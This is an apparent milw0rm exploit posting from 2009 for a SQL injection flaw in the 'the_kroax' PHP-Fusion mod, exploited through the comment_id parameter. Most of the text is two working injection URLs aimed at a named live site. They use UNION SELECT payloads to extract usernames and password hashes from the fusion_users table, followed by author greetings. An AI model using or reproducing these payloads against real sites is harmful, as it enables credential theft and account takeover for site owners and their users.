PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability ----------------------------------------------------------------------------------------------------------- [+]Author by : FasTWORM [+]home: Cyber-Warrior.Org [+]exploit: [+]http://www.beylerli.com/infusions/the_kroax/callcomments.php?comment_id=-999'+union+select+0,1905,2,3,user_name,5,6,1905+from+fusion_users/* [+]http://www.beylerli.com/infusions/the_kroax/callcomments.php?comment_id=-999'+union+select+0,1905,2,3,user_password,5,6,1905+from+fusion_users/* ---------------------------------------------------------------------------------------------------------------------- [+]Greetz : BackDooR , Tr-ShaRk , All CW Users [+]Note : Bugun Doğum Günüm :) ---------------------------------------------------------------------------------------------------------------------- # milw0rm.com [2009-01-11]